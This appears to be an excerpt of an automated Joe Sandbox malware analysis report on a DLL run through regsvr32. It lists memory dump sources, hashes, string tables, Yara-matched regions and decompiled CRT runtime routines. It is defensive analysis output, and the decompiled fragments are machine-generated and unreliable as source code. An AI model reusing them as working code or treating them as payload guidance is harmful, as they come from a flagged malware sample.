                                                                    • Instruction ID: df5636f5ee55eb5a1123ad47329e94e2a1af4504a4e9b44811c9c5941fd1bffd
                                                                    • Opcode Fuzzy Hash: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                                                    • Instruction Fuzzy Hash: 6CC04C64D15A01C1EA445726FC8536822A06394745FA0C021C5CD012308B2F55968701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID:
                                                                    • API String ID: 2118026453-0
                                                                    • Opcode ID: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                                                    • Instruction ID: 5c830059afc01ab3dffeb0f702370a5898bb96dd38ab511ff450623a486f5942
                                                                    • Opcode Fuzzy Hash: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                                                    • Instruction Fuzzy Hash: F1A00224F16591D7DAAC373A5D9713D11A06B68709FF05869C74F40261CE2F92FE8B05
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_snwprintf_s_unlock_wcsftime_l
                                                                    • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $P$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportW$_itow_s(nLine, szLineMessage, 4096, 10)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")$wcscat_s(szLineMessage, 4096, L"\n")$wcscat_s(szLineMessage, 4096, L"\r")$wcscat_s(szLineMessage, 4096, szUserMessage)$wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))$wcstombs_s(((void *)0), szOutMessage2, 4096, szOutMessage, ((size_t)-1))
                                                                    • API String ID: 4197005980-4190456261
                                                                    • Opcode ID: 4879bfb960a2721f9666c96030d6b34d6758162388cb50bc2d04b6b5102aed05
                                                                    • Instruction ID: 631fc2af3d1e2e358681470289229c30ebeab24735d73449bcceef6109dc099e
                                                                    • Opcode Fuzzy Hash: 4879bfb960a2721f9666c96030d6b34d6758162388cb50bc2d04b6b5102aed05
                                                                    • Instruction Fuzzy Hash: 6B421031A0CA8685EBB0CB14E8547EE73E4F784345FA04226D6CD43AA9DF7EE549CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$Decode$AddressEncodeLibraryLoadProc
                                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                    • API String ID: 2256938910-232180764
                                                                    • Opcode ID: 7f66a9951f4a4371a03f8907a7d8dae5388e10f0167802e39e15e0e0cc6986ee
                                                                    • Instruction ID: c20bf9db26653c31616cb8f8a39641649b62d884e8934e9a70f617ae2971618d
                                                                    • Opcode Fuzzy Hash: 7f66a9951f4a4371a03f8907a7d8dae5388e10f0167802e39e15e0e0cc6986ee
                                                                    • Instruction Fuzzy Hash: 9A81C631A19B8686E7A09B19FC4436EB3E0F784755F608135DACE426B8DF7EE448CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$Invalid allocation size: %Iu bytes.$Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$_pFirstBlock == pOldBlock$_pLastBlock == pOldBlock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$fRealloc || (!fRealloc && pNewBlock == pOldBlock)$pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_REQ
                                                                    • API String ID: 0-1181733849
                                                                    • Opcode ID: 0b4b4e85d1eb3ae1a0b395440fade81dc617beeaf4b680a727513a857c3a72e7
                                                                    • Instruction ID: c027552587c484905274aa3c7dfc2130a2bba284c4db387798f357193d3a2f5b
                                                                    • Opcode Fuzzy Hash: 0b4b4e85d1eb3ae1a0b395440fade81dc617beeaf4b680a727513a857c3a72e7
                                                                    • Instruction Fuzzy Hash: B3421035A0DB8685EBA08B69E88076E77E0F785794F214136DADD83BB4DB7ED440CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    • Client hook free failure., xrefs: 000007FEF9D254A0
                                                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2573C
                                                                    • _CrtIsValidHeapPointer(pUserData), xrefs: 000007FEF9D254E2
                                                                    • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c, xrefs: 000007FEF9D254F7, 000007FEF9D2556D, 000007FEF9D257FE
                                                                    • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 000007FEF9D257E9
                                                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25683
                                                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D2579F
                                                                    • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 000007FEF9D2542B
                                                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25620
                                                                    • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 000007FEF9D25558
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: HeapPointerValid_free_base
                                                                    • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ
                                                                    • API String ID: 1656799702-182684663
                                                                    • Opcode ID: 708cd418722caba3a196df14d36aa04cdda5776576cdf5b3aec82fe9c7f2493c
                                                                    • Instruction ID: 30c4da0a101ad128366c20b2541b857d1a248eb6f856515bedc9f5e1dcd2840f
                                                                    • Opcode Fuzzy Hash: 708cd418722caba3a196df14d36aa04cdda5776576cdf5b3aec82fe9c7f2493c
                                                                    • Instruction Fuzzy Hash: 58C16E36A18B4586EBA48B59E88076EB7E0F785790F614536EACD43BB4DB7ED401CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                                                    • _heapchk fails with _HEAPBADEND., xrefs: 000007FEF9D25D4D
                                                                    • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                                                    • _heapchk fails with unknown return value!, xrefs: 000007FEF9D25DAF
                                                                    • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed., xrefs: 000007FEF9D260FA
                                                                    • _heapchk fails with _HEAPBADNODE., xrefs: 000007FEF9D25D19
                                                                    • DAMAGED, xrefs: 000007FEF9D25E7D
                                                                    • _heapchk fails with _HEAPBADBEGIN., xrefs: 000007FEF9D25CE5
                                                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25F42
                                                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D26030
                                                                    • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                                                    • _1, xrefs: 000007FEF9D261FC
                                                                    • _heapchk fails with _HEAPBADPTR., xrefs: 000007FEF9D25D7E
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$DAMAGED$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).$_heapchk fails with _HEAPBADBEGIN.$_heapchk fails with _HEAPBADEND.$_heapchk fails with _HEAPBADNODE.$_heapchk fails with _HEAPBADPTR.$_heapchk fails with unknown return value!$_1
                                                                    • API String ID: 0-510578482
                                                                    • Opcode ID: 15b327a6fa8e12693a207a0a7b33494fdffa5f56c7c2417c86fde08a07b35573
                                                                    • Instruction ID: 2e3929c610d79aeb9f6375ea398ef70322b77c1420209f8d6f9956d4446a531d
                                                                    • Opcode Fuzzy Hash: 15b327a6fa8e12693a207a0a7b33494fdffa5f56c7c2417c86fde08a07b35573
                                                                    • Instruction Fuzzy Hash: A6E13F36A18B5586EBA4CB69E88072EB7E0F384754F614526EACD43BB4DB7ED051CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: E$#r5|$:B)$:F&$Jq-.$K$K$Y]$kJ$kJ$sg
                                                                    • API String ID: 0-2241473280
                                                                    • Opcode ID: cddb9e216d5522f206da78d8fc0cd1a272e9a6010eb05564972df6001c09f508
                                                                    • Instruction ID: 9c682bca3309bc02ed949a6de7aa3bb6d22b0761abc13177b84899e0b503d48e
                                                                    • Opcode Fuzzy Hash: cddb9e216d5522f206da78d8fc0cd1a272e9a6010eb05564972df6001c09f508
                                                                    • Instruction Fuzzy Hash: 73E2E4715047CC8BDBB9DFA4C8897DD3BA1FB44344F10861AEC4EAE250DBB45A89CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 57%
                                                                    			E000007FE7FEF9D23280(void* __eax, signed int __ecx, signed int __edx, signed int __rcx, signed int __rdx, void* __r8) {
                                                                    				void* _t7;
                                                                    				void* _t10;
                                                                    				signed long long _t15;
                                                                    				signed long long* _t16;
                                                                    				signed long long _t20;
                                                                    				signed long long _t24;
                                                                    
                                                                    				_t7 = __rcx -  *0xf9d4b018; // 0x6ec4cabc2720
                                                                    				if (_t7 != 0) goto 0xf9d2329a;
                                                                    				asm("dec eax");
                                                                    				if ((__ecx & 0x0000ffff) != 0) goto 0xf9d23296;
                                                                    				asm("repe ret");
                                                                    				asm("dec eax");
                                                                    				goto 0xf9d23720;
                                                                    				asm("int3");
                                                                    				asm("int3");
                                                                    				asm("int3");
                                                                    				asm("int3");
                                                                    				asm("int3");
                                                                    				asm("int3");
                                                                    				asm("int3");
                                                                    				asm("o16 nop [eax+eax]");
                                                                    				if (__r8 - 8 < 0) goto 0xf9d2330c;
                                                                    				_t20 = __rdx * 0x1010101;
                                                                    				_t10 = __r8 - 0x40;
                                                                    				if (_t10 < 0) goto 0xf9d232ee;
                                                                    				_t15 =  ~__rcx;
                                                                    				if (_t10 == 0) goto 0xf9d232de;
                                                                    				 *__rcx = _t20;
                                                                    				_t16 = _t15 + __rcx;
                                                                    				if (_t10 != 0) goto 0xf9d23327;
                                                                    				_t24 = __r8 - _t15 & 7;
                                                                    				if (_t10 == 0) goto 0xf9d2330c;
                                                                    				 *_t16 = _t20;
                                                                    				if (_t10 != 0) goto 0xf9d23300;
                                                                    				if (_t24 == 0) goto 0xf9d2331b;
                                                                    				_t16[1] = __edx & 0x000000ff;
                                                                    				if (_t24 - 1 != 0) goto 0xf9d23311;
                                                                    				return __eax;
                                                                    			}









                                                                    0x7fef9d23280
                                                                    0x7fef9d23287
                                                                    0x7fef9d23289
                                                                    0x7fef9d23292
                                                                    0x7fef9d23294
                                                                    0x7fef9d23296
                                                                    0x7fef9d2329a
                                                                    0x7fef9d2329f
                                                                    0x7fef9d232a0
                                                                    0x7fef9d232a1
                                                                    0x7fef9d232a2
                                                                    0x7fef9d232a3
                                                                    0x7fef9d232a4
                                                                    0x7fef9d232a5
                                                                    0x7fef9d232a6
                                                                    0x7fef9d232b7
                                                                    0x7fef9d232c6
                                                                    0x7fef9d232ca
                                                                    0x7fef9d232ce
                                                                    0x7fef9d232d0
                                                                    0x7fef9d232d6
                                                                    0x7fef9d232db
                                                                    0x7fef9d232de
                                                                    0x7fef9d232ec
                                                                    0x7fef9d232f1
                                                                    0x7fef9d232f9
                                                                    0x7fef9d23300
                                                                    0x7fef9d2330a
                                                                    0x7fef9d2330f
                                                                    0x7fef9d23311
                                                                    0x7fef9d23319
                                                                    0x7fef9d2331b

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 3778485334-0
                                                                    • Opcode ID: c7ac20398f1e0bfcda68d30e042a710a2d00de73d3b00f2192fd5d70b0bf2831
                                                                    • Instruction ID: 807cfb07a33e429e3d371e20a7d7f9b872ed56a9d2d7ce20ec260cf370a1508c
                                                                    • Opcode Fuzzy Hash: c7ac20398f1e0bfcda68d30e042a710a2d00de73d3b00f2192fd5d70b0bf2831
                                                                    • Instruction Fuzzy Hash: 9B31B435908B4685EAA09B69FD443AEB3E0F784794F608026DACD43775DF7EE0588B41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _unlock
                                                                    • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                    • API String ID: 2480363372-3680694803
                                                                    • Opcode ID: 5582fb477a99f139482b647e65eadd7bcea0024aa5ad3136cc4be02f6e7bf908
                                                                    • Instruction ID: 8b5a52ed6c75746639c18038ef7af0115634e61e6ce836c346e70c61fc8f1b15
                                                                    • Opcode Fuzzy Hash: 5582fb477a99f139482b647e65eadd7bcea0024aa5ad3136cc4be02f6e7bf908
                                                                    • Instruction Fuzzy Hash: 58510931A096828AE7F48B68EC4576E73E4F395354F618135DADD83BB4EB3EE4448B01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$ $A2>$Mum$vQ$=D$Fa
                                                                    • API String ID: 0-1298193321
                                                                    • Opcode ID: 982ab4627d106152f76a325de243923c319ce5c47f351cfe718817436c28ee1d
                                                                    • Instruction ID: 1349cc56659c19f01a369150ff0067e3f34eaebe01bc07430d2f97da03610ed5
                                                                    • Opcode Fuzzy Hash: 982ab4627d106152f76a325de243923c319ce5c47f351cfe718817436c28ee1d
                                                                    • Instruction Fuzzy Hash: 24522775A0620CDFCB68DFA8D08A6DDBBF2EF58344F104119F816A7261D7B0D919CB89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ._$8%Y$@4<$F+}$R1$t$xy
                                                                    • API String ID: 0-3078009748
                                                                    • Opcode ID: 7cd976f9c86f50bd1c1ca064b29a615496490d447d7d5288ee1f6aa5414266f6
                                                                    • Instruction ID: 0e1afbee3b71ea3b5863fe80692b11929ebce18e29255cef2241f67d7a77c22f
                                                                    • Opcode Fuzzy Hash: 7cd976f9c86f50bd1c1ca064b29a615496490d447d7d5288ee1f6aa5414266f6
                                                                    • Instruction Fuzzy Hash: 0402E1B1504649DFCB98DF28C489ADE3BE1FB48318F41812AFC4A9B764D770DA98CB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 33%
                                                                    			E000007FE7FEF9D2BE50(intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
                                                                    				intOrPtr _v4;
                                                                    				void* _v12;
                                                                    				signed long long _v24;
                                                                    				signed int _v36;
                                                                    				long long _v180;
                                                                    				long long _v184;
                                                                    				intOrPtr _v192;
                                                                    				char _v196;
                                                                    				intOrPtr _v204;
                                                                    				long _v212;
                                                                    				long long _v220;
                                                                    				long long _v228;
                                                                    				long long _v1212;
                                                                    				long long _v1308;
                                                                    				char _v1460;
                                                                    				char _v1476;
                                                                    				char _v1484;
                                                                    				int _v1492;
                                                                    				long long _v1500;
                                                                    				long long _v1508;
                                                                    				long long _v1516;
                                                                    				long long _v1524;
                                                                    				long long _v1532;
                                                                    				long long _v1540;
                                                                    				void* _t51;
                                                                    				signed long long _t80;
                                                                    				long long _t85;
                                                                    				void* _t100;
                                                                    
                                                                    				_a24 = r8d;
                                                                    				_a16 = __edx;
                                                                    				_a8 = __ecx;
                                                                    				_t80 =  *0xf9d4b018; // 0x6ec4cabc2720
                                                                    				_v24 = _t80 ^ _t100 - 0x00000610;
                                                                    				if (_a8 == 0xffffffff) goto 0xf9d2be8d;
                                                                    				E000007FE7FEF9D28D90(_t51, _a8);
                                                                    				_v184 = 0;
                                                                    				memset(__edi, 0, 0x94 << 0);
                                                                    				_v1508 =  &_v196;
                                                                    				_v1500 =  &_v1460;
                                                                    				_v1492 = 0;
                                                                    				_v212 = 0;
                                                                    				__imp__RtlCaptureContext();
                                                                    				_t85 = _v1212;
                                                                    				_v220 = _t85;
                                                                    				r8d = 0;
                                                                    				0xf9d40e28();
                                                                    				_v228 = _t85;
                                                                    				if (_v228 == 0) goto 0xf9d2bf64;
                                                                    				_v1516 = 0;
                                                                    				_v1524 =  &_v1476;
                                                                    				_v1532 =  &_v1484;
                                                                    				_v1540 =  &_v1460;
                                                                    				0xf9d40e22();
                                                                    				goto 0xf9d2bf84;
                                                                    				_v1212 = _v12;
                                                                    				_v1308 =  &_v12;
                                                                    				_v196 = _a4;
                                                                    				_v192 = _a12;
                                                                    				_v180 = _v12;
                                                                    				_v1492 = IsDebuggerPresent();
                                                                    				SetUnhandledExceptionFilter(??);
                                                                    				_v212 = UnhandledExceptionFilter(??);
                                                                    				if (_v212 != 0) goto 0xf9d2bffb;
                                                                    				if (_v1492 != 0) goto 0xf9d2bffb;
                                                                    				if (_v4 == 0xffffffff) goto 0xf9d2bffb;
                                                                    				return E000007FE7FEF9D23280(E000007FE7FEF9D28D90(_t59, _v4), _v4, __edx, _v36 ^ _t100 - 0x00000610, _v204, _v220);
                                                                    			}































                                                                    0x7fef9d2be50
                                                                    0x7fef9d2be55
                                                                    0x7fef9d2be59
                                                                    0x7fef9d2be65
                                                                    0x7fef9d2be6f
                                                                    0x7fef9d2be7f
                                                                    0x7fef9d2be88
                                                                    0x7fef9d2be8d
                                                                    0x7fef9d2beaa
                                                                    0x7fef9d2beb4
                                                                    0x7fef9d2bebe
                                                                    0x7fef9d2bec3
                                                                    0x7fef9d2becb
                                                                    0x7fef9d2bedb
                                                                    0x7fef9d2bee1
                                                                    0x7fef9d2bee9
                                                                    0x7fef9d2bef1
                                                                    0x7fef9d2bf04
                                                                    0x7fef9d2bf09
                                                                    0x7fef9d2bf1a
                                                                    0x7fef9d2bf1c
                                                                    0x7fef9d2bf2a
                                                                    0x7fef9d2bf34
                                                                    0x7fef9d2bf3e
                                                                    0x7fef9d2bf5d
                                                                    0x7fef9d2bf62
                                                                    0x7fef9d2bf6c
                                                                    0x7fef9d2bf7c
                                                                    0x7fef9d2bf8b
                                                                    0x7fef9d2bf99
                                                                    0x7fef9d2bfa8
                                                                    0x7fef9d2bfb6
                                                                    0x7fef9d2bfbc
                                                                    0x7fef9d2bfcd
                                                                    0x7fef9d2bfdc
                                                                    0x7fef9d2bfe3
                                                                    0x7fef9d2bfed
                                                                    0x7fef9d2c013

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
